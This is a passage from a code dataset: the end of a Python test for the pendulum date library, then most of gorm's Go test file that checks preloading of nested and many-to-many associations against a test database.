assert farthest == dts[-1]
def test_is_same_day():
dt1 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt2 = pendulum.datetime(2015, 5, 29, 12, 0, 0)
dt3 = pendulum.datetime(2015, 5, 28, 12, 0, 0)
dt4 = datetime(2015, 5, 28, 12, 0, 0, tzinfo=pendulum.UTC)
dt5 = datetime(2015, 5, 29, 12, 0, 0, tzinfo=pendulum.UTC)
assert not dt1.is_same_day(dt2)
assert dt1.is_same_day(dt3)
assert dt1.is_same_day(dt4)
assert not dt1.is_same_day(dt5)
def test_comparison_to_unsupported():
dt1 = pendulum.now()
assert dt1 != "test"
assert dt1 not in ["test"]
| []
| []
| []
| [] | [] | python | null | null | null |
vendor/github.com/jinzhu/gorm/preload_test.go | package gorm_test
import (
"database/sql"
"encoding/json"
"os"
"reflect"
"testing"
"github.com/jinzhu/gorm"
)
func getPreloadUser(name string) *User {
return getPreparedUser(name, "Preload")
}
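// checkUserHasPreloadData asserts that every preloaded association on user matches
// the fixture built by getPreloadUser.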
func checkUserHasPreloadData(user User, t *testing.T) {
u := getPreloadUser(user.Name)
if user.BillingAddress.Address1 != u.BillingAddress.Address1 {
t.Error("Failed to preload user's BillingAddress")
}
if user.ShippingAddress.Address1 != u.ShippingAddress.Address1 {
t.Error("Failed to preload user's ShippingAddress")
}
if user.CreditCard.Number != u.CreditCard.Number {
t.Error("Failed to preload user's CreditCard")
}
if user.Company.Name != u.Company.Name {
t.Error("Failed to preload user's Company")
}
if len(user.Emails) != len(u.Emails) {
t.Error("Failed to preload user's Emails")
} else {
var found int
for _, e1 := range u.Emails {
for _, e2 := range user.Emails {
if e1.Email == e2.Email {
found++
break
}
}
}
if found != len(u.Emails) {
t.Error("Failed to preload user's email details")
}
}
}
func TestPreload(t *testing.T) {
user1 := getPreloadUser("user1")
DB.Save(user1)
preloadDB := DB.Where("role = ?", "Preload").Preload("BillingAddress").Preload("ShippingAddress").
Preload("CreditCard").Preload("Emails").Preload("Company")
var user User
preloadDB.Find(&user)
checkUserHasPreloadData(user, t)
user2 := getPreloadUser("user2")
DB.Save(user2)
user3 := getPreloadUser("user3")
DB.Save(user3)
var users []User
preloadDB.Find(&users)
for _, user := range users {
checkUserHasPreloadData(user, t)
}
var users2 []*User
preloadDB.Find(&users2)
for _, user := range users2 {
checkUserHasPreloadData(*user, t)
}
var users3 []*User
preloadDB.Preload("Emails", "email = ?", user3.Emails[0].Email).Find(&users3)
for _, user := range users3 {
if user.Name == user3.Name {
if len(user.Emails) != 1 {
t.Errorf("should only preload one emails for user3 when with condition")
}
} else if len(user.Emails) != 0 {
t.Errorf("should not preload any emails for other users when with condition")
} else if user.Emails == nil {
t.Errorf("should return an empty slice to indicate zero results")
}
}
}
func TestAutoPreload(t *testing.T) {
user1 := getPreloadUser("auto_user1")
DB.Save(user1)
preloadDB := DB.Set("gorm:auto_preload", true).Where("role = ?", "Preload")
var user User
preloadDB.Find(&user)
checkUserHasPreloadData(user, t)
user2 := getPreloadUser("auto_user2")
DB.Save(user2)
var users []User
preloadDB.Find(&users)
for _, user := range users {
checkUserHasPreloadData(user, t)
}
var users2 []*User
preloadDB.Find(&users2)
for _, user := range users2 {
checkUserHasPreloadData(*user, t)
}
}
func TestAutoPreloadFalseDoesntPreload(t *testing.T) {
user1 := getPreloadUser("auto_user1")
DB.Save(user1)
preloadDB := DB.Set("gorm:auto_preload", false).Where("role = ?", "Preload")
var user User
preloadDB.Find(&user)
if user.BillingAddress.Address1 != "" {
t.Error("AutoPreload was set to fasle, but still fetched data")
}
user2 := getPreloadUser("auto_user2")
DB.Save(user2)
var users []User
preloadDB.Find(&users)
for _, user := range users {
if user.BillingAddress.Address1 != "" {
t.Error("AutoPreload was set to fasle, but still fetched data")
}
}
}
func TestNestedPreload1(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{Level2: Level2{Level1: Level1{Value: "value"}}}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2").Preload("Level2.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
if err := DB.Preload("Level2").Preload("Level2.Level1").Find(&got, "name = ?", "not_found").Error; err != gorm.ErrRecordNotFound {
t.Error(err)
}
}
func TestNestedPreload2(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []*Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Level2s: []Level2{
{
Level1s: []*Level1{
{Value: "value1"},
{Value: "value2"},
},
},
{
Level1s: []*Level1{
{Value: "value3"},
},
},
},
}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2s.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload3(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
Name string
ID uint
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Level2s: []Level2{
{Level1: Level1{Value: "value1"}},
{Level1: Level1{Value: "value2"}},
},
}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2s.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload4(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
}
if err := DB.Create(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
// Slice: []Level3
func TestNestedPreload5(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{Level2: Level2{Level1: Level1{Value: "value"}}}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{Level2: Level2{Level1: Level1{Value: "value2"}}}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2").Preload("Level2.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload6(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2s: []Level2{
{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
{
Level1s: []Level1{
{Value: "value3"},
},
},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2s: []Level2{
{
Level1s: []Level1{
{Value: "value3"},
{Value: "value4"},
},
},
{
Level1s: []Level1{
{Value: "value5"},
},
},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2s.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload7(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1 Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2s []Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2s: []Level2{
{Level1: Level1{Value: "value1"}},
{Level1: Level1{Value: "value2"}},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2s: []Level2{
{Level1: Level1{Value: "value3"}},
{Level1: Level1{Value: "value4"}},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2s.Level1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload8(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
Level2ID uint
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value3"},
{Value: "value4"},
},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2.Level1s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestNestedPreload9(t *testing.T) {
type (
Level0 struct {
ID uint
Value string
Level1ID uint
}
Level1 struct {
ID uint
Value string
Level2ID uint
Level2_1ID uint
Level0s []Level0
}
Level2 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level2_1 struct {
ID uint
Level1s []Level1
Level3ID uint
}
Level3 struct {
ID uint
Name string
Level2 Level2
Level2_1 Level2_1
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level2_1{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level0{})
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}, &Level2_1{}, &Level0{}).Error; err != nil {
t.Error(err)
}
want := make([]Level3, 2)
want[0] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value1"},
{Value: "value2"},
},
},
Level2_1: Level2_1{
Level1s: []Level1{
{
Value: "value1-1",
Level0s: []Level0{{Value: "Level0-1"}},
},
{
Value: "value2-2",
Level0s: []Level0{{Value: "Level0-2"}},
},
},
},
}
if err := DB.Create(&want[0]).Error; err != nil {
t.Error(err)
}
want[1] = Level3{
Level2: Level2{
Level1s: []Level1{
{Value: "value3"},
{Value: "value4"},
},
},
Level2_1: Level2_1{
Level1s: []Level1{
{
Value: "value3-3",
Level0s: []Level0{},
},
{
Value: "value4-4",
Level0s: []Level0{},
},
},
},
}
if err := DB.Create(&want[1]).Error; err != nil {
t.Error(err)
}
var got []Level3
if err := DB.Preload("Level2").Preload("Level2.Level1s").Preload("Level2_1").Preload("Level2_1.Level1s").Preload("Level2_1.Level1s.Level0s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
type LevelA1 struct {
ID uint
Value string
}
type LevelA2 struct {
ID uint
Value string
LevelA3s []*LevelA3
}
type LevelA3 struct {
ID uint
Value string
LevelA1ID sql.NullInt64
LevelA1 *LevelA1
LevelA2ID sql.NullInt64
LevelA2 *LevelA2
}
func TestNestedPreload10(t *testing.T) {
DB.DropTableIfExists(&LevelA3{})
DB.DropTableIfExists(&LevelA2{})
DB.DropTableIfExists(&LevelA1{})
if err := DB.AutoMigrate(&LevelA1{}, &LevelA2{}, &LevelA3{}).Error; err != nil {
t.Error(err)
}
levelA1 := &LevelA1{Value: "foo"}
if err := DB.Save(levelA1).Error; err != nil {
t.Error(err)
}
want := []*LevelA2{
{
Value: "bar",
LevelA3s: []*LevelA3{
{
Value: "qux",
LevelA1: levelA1,
},
},
},
{
Value: "bar 2",
LevelA3s: []*LevelA3{},
},
}
for _, levelA2 := range want {
if err := DB.Save(levelA2).Error; err != nil {
t.Error(err)
}
}
var got []*LevelA2
if err := DB.Preload("LevelA3s.LevelA1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
type LevelB1 struct {
ID uint
Value string
LevelB3s []*LevelB3
}
type LevelB2 struct {
ID uint
Value string
}
type LevelB3 struct {
ID uint
Value string
LevelB1ID sql.NullInt64
LevelB1 *LevelB1
LevelB2s []*LevelB2 `gorm:"many2many:levelb1_levelb3_levelb2s"`
}
func TestNestedPreload11(t *testing.T) {
DB.DropTableIfExists(&LevelB2{})
DB.DropTableIfExists(&LevelB3{})
DB.DropTableIfExists(&LevelB1{})
if err := DB.AutoMigrate(&LevelB1{}, &LevelB2{}, &LevelB3{}).Error; err != nil {
t.Error(err)
}
levelB1 := &LevelB1{Value: "foo"}
if err := DB.Create(levelB1).Error; err != nil {
t.Error(err)
}
levelB3 := &LevelB3{
Value: "bar",
LevelB1ID: sql.NullInt64{Valid: true, Int64: int64(levelB1.ID)},
}
if err := DB.Create(levelB3).Error; err != nil {
t.Error(err)
}
levelB1.LevelB3s = []*LevelB3{levelB3}
want := []*LevelB1{levelB1}
var got []*LevelB1
if err := DB.Preload("LevelB3s.LevelB2s").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
type LevelC1 struct {
ID uint
Value string
LevelC2ID uint
}
type LevelC2 struct {
ID uint
Value string
LevelC1 LevelC1
}
type LevelC3 struct {
ID uint
Value string
LevelC2ID uint
LevelC2 LevelC2
}
func TestNestedPreload12(t *testing.T) {
DB.DropTableIfExists(&LevelC2{})
DB.DropTableIfExists(&LevelC3{})
DB.DropTableIfExists(&LevelC1{})
if err := DB.AutoMigrate(&LevelC1{}, &LevelC2{}, &LevelC3{}).Error; err != nil {
t.Error(err)
}
level2 := LevelC2{
Value: "c2",
LevelC1: LevelC1{
Value: "c1",
},
}
DB.Create(&level2)
want := []LevelC3{
{
Value: "c3-1",
LevelC2: level2,
}, {
Value: "c3-2",
LevelC2: level2,
},
}
for i := range want {
if err := DB.Create(&want[i]).Error; err != nil {
t.Error(err)
}
}
var got []LevelC3
if err := DB.Preload("LevelC2").Preload("LevelC2.LevelC1").Find(&got).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
}
func TestManyToManyPreloadWithMultiPrimaryKeys(t *testing.T) {
if dialect := os.Getenv("GORM_DIALECT"); dialect == "" || dialect == "sqlite" || dialect == "mssql" {
return
}
type (
Level1 struct {
ID uint `gorm:"primary_key;"`
LanguageCode string `gorm:"primary_key"`
Value string
}
Level2 struct {
ID uint `gorm:"primary_key;"`
LanguageCode string `gorm:"primary_key"`
Value string
Level1s []Level1 `gorm:"many2many:levels;"`
}
)
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists("levels")
if err := DB.AutoMigrate(&Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level2{Value: "Bob", LanguageCode: "ru", Level1s: []Level1{
{Value: "ru", LanguageCode: "ru"},
{Value: "en", LanguageCode: "en"},
}}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level2{Value: "Tom", LanguageCode: "zh", Level1s: []Level1{
{Value: "zh", LanguageCode: "zh"},
{Value: "de", LanguageCode: "de"},
}}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got Level2
if err := DB.Preload("Level1s").Find(&got, "value = ?", "Bob").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
var got2 Level2
if err := DB.Preload("Level1s").Find(&got2, "value = ?", "Tom").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got2, want2) {
t.Errorf("got %s; want %s", toJSONString(got2), toJSONString(want2))
}
var got3 []Level2
if err := DB.Preload("Level1s").Find(&got3, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got3, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got3), toJSONString([]Level2{got, got2}))
}
var got4 []Level2
if err := DB.Preload("Level1s", "value IN (?)", []string{"zh", "ru"}).Find(&got4, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
var ruLevel1 Level1
var zhLevel1 Level1
DB.First(&ruLevel1, "value = ?", "ru")
DB.First(&zhLevel1, "value = ?", "zh")
got.Level1s = []Level1{ruLevel1}
got2.Level1s = []Level1{zhLevel1}
if !reflect.DeepEqual(got4, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got4), toJSONString([]Level2{got, got2}))
}
if err := DB.Preload("Level1s").Find(&got4, "value IN (?)", []string{"non-existing"}).Error; err != nil {
t.Error(err)
}
}
func TestManyToManyPreloadForNestedPointer(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:levels;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 *Level2
}
)
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists("levels")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Value: "Bob",
Level2: &Level2{
Value: "Foo",
Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level3{
Value: "Tom",
Level2: &Level2{
Value: "Bar",
Level1s: []*Level1{
{Value: "zh"},
{Value: "de"},
},
},
}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2.Level1s").Find(&got, "value = ?", "Bob").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
var got2 Level3
if err := DB.Preload("Level2.Level1s").Find(&got2, "value = ?", "Tom").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got2, want2) {
t.Errorf("got %s; want %s", toJSONString(got2), toJSONString(want2))
}
var got3 []Level3
if err := DB.Preload("Level2.Level1s").Find(&got3, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got3, []Level3{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got3), toJSONString([]Level3{got, got2}))
}
var got4 []Level3
if err := DB.Preload("Level2.Level1s", "value IN (?)", []string{"zh", "ru"}).Find(&got4, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
var got5 Level3
DB.Preload("Level2.Level1s").Find(&got5, "value = ?", "bogus")
var ruLevel1 Level1
var zhLevel1 Level1
DB.First(&ruLevel1, "value = ?", "ru")
DB.First(&zhLevel1, "value = ?", "zh")
got.Level2.Level1s = []*Level1{&ruLevel1}
got2.Level2.Level1s = []*Level1{&zhLevel1}
if !reflect.DeepEqual(got4, []Level3{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got4), toJSONString([]Level3{got, got2}))
}
}
func TestNestedManyToManyPreload(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2s []Level2 `gorm:"many2many:level2_level3;"`
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
DB.DropTableIfExists("level2_level3")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Value: "Level3",
Level2s: []Level2{
{
Value: "Bob",
Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
},
}, {
Value: "Tom",
Level1s: []*Level1{
{Value: "zh"},
{Value: "de"},
},
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2s").Preload("Level2s.Level1s").Find(&got, "value = ?", "Level3").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
if err := DB.Preload("Level2s.Level1s").Find(&got, "value = ?", "not_found").Error; err != gorm.ErrRecordNotFound {
t.Error(err)
}
}
func TestNestedManyToManyPreload2(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 *Level2
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level3{
Value: "Level3",
Level2: &Level2{
Value: "Bob",
Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
},
},
}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
var got Level3
if err := DB.Preload("Level2.Level1s").Find(&got, "value = ?", "Level3").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
if err := DB.Preload("Level2.Level1s").Find(&got, "value = ?", "not_found").Error; err != gorm.ErrRecordNotFound {
t.Error(err)
}
}
func TestNestedManyToManyPreload3(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 *Level2
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
level1Zh := &Level1{Value: "zh"}
level1Ru := &Level1{Value: "ru"}
level1En := &Level1{Value: "en"}
level21 := &Level2{
Value: "Level2-1",
Level1s: []*Level1{level1Zh, level1Ru},
}
level22 := &Level2{
Value: "Level2-2",
Level1s: []*Level1{level1Zh, level1En},
}
wants := []*Level3{
{
Value: "Level3-1",
Level2: level21,
},
{
Value: "Level3-2",
Level2: level22,
},
{
Value: "Level3-3",
Level2: level21,
},
}
for _, want := range wants {
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
}
var gots []*Level3
if err := DB.Preload("Level2.Level1s", func(db *gorm.DB) *gorm.DB {
return db.Order("level1.id ASC")
}).Find(&gots).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(gots, wants) {
t.Errorf("got %s; want %s", toJSONString(gots), toJSONString(wants))
}
}
func TestNestedManyToManyPreload3ForStruct(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []Level1 `gorm:"many2many:level1_level2;"`
}
Level3 struct {
ID uint
Value string
Level2ID sql.NullInt64
Level2 Level2
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists("level1_level2")
if err := DB.AutoMigrate(&Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
level1Zh := Level1{Value: "zh"}
level1Ru := Level1{Value: "ru"}
level1En := Level1{Value: "en"}
level21 := Level2{
Value: "Level2-1",
Level1s: []Level1{level1Zh, level1Ru},
}
level22 := Level2{
Value: "Level2-2",
Level1s: []Level1{level1Zh, level1En},
}
wants := []*Level3{
{
Value: "Level3-1",
Level2: level21,
},
{
Value: "Level3-2",
Level2: level22,
},
{
Value: "Level3-3",
Level2: level21,
},
}
for _, want := range wants {
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
}
var gots []*Level3
if err := DB.Preload("Level2.Level1s", func(db *gorm.DB) *gorm.DB {
return db.Order("level1.id ASC")
}).Find(&gots).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(gots, wants) {
t.Errorf("got %s; want %s", toJSONString(gots), toJSONString(wants))
}
}
func TestNestedManyToManyPreload4(t *testing.T) {
type (
Level4 struct {
ID uint
Value string
Level3ID uint
}
Level3 struct {
ID uint
Value string
Level4s []*Level4
}
Level2 struct {
ID uint
Value string
Level3s []*Level3 `gorm:"many2many:level2_level3;"`
}
Level1 struct {
ID uint
Value string
Level2s []*Level2 `gorm:"many2many:level1_level2;"`
}
)
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level3{})
DB.DropTableIfExists(&Level4{})
DB.DropTableIfExists("level1_level2")
DB.DropTableIfExists("level2_level3")
dummy := Level1{
Value: "Level1",
Level2s: []*Level2{{
Value: "Level2",
Level3s: []*Level3{{
Value: "Level3",
Level4s: []*Level4{{
Value: "Level4",
}},
}},
}},
}
if err := DB.AutoMigrate(&Level4{}, &Level3{}, &Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
if err := DB.Save(&dummy).Error; err != nil {
t.Error(err)
}
var level1 Level1
if err := DB.Preload("Level2s").Preload("Level2s.Level3s").Preload("Level2s.Level3s.Level4s").First(&level1).Error; err != nil {
t.Error(err)
}
}
func TestManyToManyPreloadForPointer(t *testing.T) {
type (
Level1 struct {
ID uint
Value string
}
Level2 struct {
ID uint
Value string
Level1s []*Level1 `gorm:"many2many:levels;"`
}
)
DB.DropTableIfExists(&Level2{})
DB.DropTableIfExists(&Level1{})
DB.DropTableIfExists("levels")
if err := DB.AutoMigrate(&Level2{}, &Level1{}).Error; err != nil {
t.Error(err)
}
want := Level2{Value: "Bob", Level1s: []*Level1{
{Value: "ru"},
{Value: "en"},
}}
if err := DB.Save(&want).Error; err != nil {
t.Error(err)
}
want2 := Level2{Value: "Tom", Level1s: []*Level1{
{Value: "zh"},
{Value: "de"},
}}
if err := DB.Save(&want2).Error; err != nil {
t.Error(err)
}
var got Level2
if err := DB.Preload("Level1s").Find(&got, "value = ?", "Bob").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got, want) {
t.Errorf("got %s; want %s", toJSONString(got), toJSONString(want))
}
var got2 Level2
if err := DB.Preload("Level1s").Find(&got2, "value = ?", "Tom").Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got2, want2) {
t.Errorf("got %s; want %s", toJSONString(got2), toJSONString(want2))
}
var got3 []Level2
if err := DB.Preload("Level1s").Find(&got3, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
if !reflect.DeepEqual(got3, []Level2{got, got2}) {
t.Errorf("got %s; want %s", toJSONString(got3), toJSONString([]Level2{got, got2}))
}
var got4 []Level2
if err := DB.Preload("Level1s", "value IN (?)", []string{"zh", "ru"}).Find(&got4, "value IN (?)", []string{"Bob", "Tom"}).Error; err != nil {
t.Error(err)
}
var got5 Level2
DB.Preload("Level1s").First(&got5, "value = ?", "bogus")
var ruLevel1 Level1
var zhLevel1 Level1
DB.First(&ruLevel1, "value = ?", "ru")
DB.First(&zhLevel1, "value = ?", "zh")
got.Level1s = []*Level1{&ruLevel1}
